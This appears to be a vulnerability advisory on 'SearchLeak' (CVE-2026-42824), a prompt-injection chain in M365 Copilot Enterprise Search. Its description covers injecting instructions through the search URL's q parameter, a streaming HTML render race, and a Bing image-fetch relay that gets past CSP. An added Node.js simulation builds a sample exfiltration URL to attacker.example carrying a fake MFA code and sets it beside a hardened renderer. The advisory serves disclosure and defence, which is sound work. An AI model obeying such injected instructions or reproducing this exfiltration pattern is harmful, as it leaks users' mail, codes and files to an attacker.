PT-2026-46401 · Microsoft · M365 Copilot
Dolev Taler
Published 2026-06-04 · Updated 2026-06-16
CVE-2026-42824
CVSS v3.1 7.5 High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
Microsoft 365 Copilot Enterprise (affected versions not specified)
Description
Improper neutralization of special elements used in a command allows an unauthorized attacker to disclose sensitive information over a network. The issue, known as SearchLeak, is a three-stage attack chain that weaponizes Copilot Enterprise Search to exfiltrate corporate data, including email contents, MFA codes, calendar details, and confidential files from SharePoint and OneDrive. Because Copilot executes the injected instructions with the victim's full Microsoft Graph permissions within the organization, anything the victim is allowed to read is within reach of the attacker.
The exploitation process involves three stages:
- Parameter-to-Prompt (P2P) Injection: the `q` parameter in the Copilot Search URL is interpreted as executable instructions rather than as a search string, allowing an attacker to command Copilot to search for and extract specific user data.
- HTML Rendering Race Condition: during the AI streaming phase, raw HTML, such as `<img>` tags, is temporarily rendered in the DOM before the sanitizer wraps the output in `<code>` blocks.
- Server-Side Request Forgery (SSRF): the attack bypasses the Content Security Policy (CSP) by using the allowlisted Bing "Search by Image" endpoint, which performs a server-side fetch of a URL containing the stolen data, relaying it to the attacker's server.
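Added example (not from this advisory and not Microsoft's code): a Node.js simulation of stages two and three of the chain above. It models a DOM container that, like a browser, requests any `<img src>` the moment markup is assigned, places the vulnerable streaming render beside a hardened one, and applies an origin-based CSP allowlist to the relay URL. The Bing URL path, the `q=imgurl:` parameter, the `attacker.example` host and the MFA value are assumptions for illustration; stage one (the `q` prompt injection) is not simulated.

```javascript
// Minimal stand-in for a browser DOM container (constructed for this example).
class FakeContainer {
  constructor() {
    this.html = "";
    this.requests = [];
  }
  // Assigning innerHTML parses markup; a browser issues a request for every
  // <img src> it creates, even if the element is replaced a moment later.
  set innerHTML(markup) {
    this.html = markup;
    for (const m of markup.matchAll(/<img\s[^>]*src=["']([^"']+)["']/gi)) {
      if (!this.requests.includes(m[1])) this.requests.push(m[1]);
    }
  }
  get innerHTML() { return this.html; }
  // Assigning textContent never creates elements, so nothing is fetched.
  set textContent(text) { this.html = escapeHtml(text); }
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: raw model output is written to the DOM on every chunk,
// and only the final answer is escaped and wrapped in <code>.
function renderStreamingVulnerable(container, chunks) {
  let buf = "";
  for (const chunk of chunks) {
    buf += chunk;
    container.innerHTML = buf; // raw HTML reaches the DOM here
  }
  container.innerHTML = "<code>" + escapeHtml(buf) + "</code>"; // too late
  return container.requests;
}

// Hardened pattern: every intermediate state is inserted as text, never as markup.
function renderStreamingSafe(container, chunks) {
  let buf = "";
  for (const chunk of chunks) {
    buf += chunk;
    container.textContent = buf;
  }
  container.innerHTML = "<code>" + escapeHtml(buf) + "</code>";
  return container.requests;
}

// Origin-based CSP check, e.g. `img-src 'self' https://www.bing.com`.
function cspAllowsImg(src, allowedOrigins) {
  return allowedOrigins.includes(new URL(src).origin);
}

// Constructed sample: stolen data (a fake MFA code) is embedded in the query
// string of an assumed Bing image-search URL that points at the attacker's
// host. Endpoint path, parameter name and hostnames are assumptions.
const ATTACKER_RELAY =
  "https://www.bing.com/images/search?q=imgurl:" +
  encodeURIComponent("https://attacker.example/collect?mfa=123456");
const STREAMED_CHUNKS = [
  "Here is what I found: ",
  '<img src="' + ATTACKER_RELAY + '">',
  " ...",
];

// Runs both renderers over the same stream and checks the relay against CSP.
function demo() {
  const leaked = renderStreamingVulnerable(new FakeContainer(), STREAMED_CHUNKS);
  const safe = renderStreamingSafe(new FakeContainer(), STREAMED_CHUNKS);
  return {
    leakedRequests: leaked,
    safeRequests: safe,
    cspBypassed: leaked.every((u) => cspAllowsImg(u, ["https://www.bing.com"])),
  };
}
```

The two points the simulation makes: escaping the final answer cannot undo a request the browser already issued from an intermediate DOM state, so streaming output must be inserted as text from the first chunk; and an origin-only `img-src` allowlist cannot tell a legitimate Bing image fetch from one used as a relay, because the request really does go to the allowlisted origin.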
Recommendations
At the moment, there is no information about a newer version that contains a fix for this vulnerability.
Weakness Enumeration
Command Injection (CWE-77: Improper Neutralization of Special Elements used in a Command)
Related Identifiers
CVE-2026-42824
Affected Products
M365 Copilot
Copilot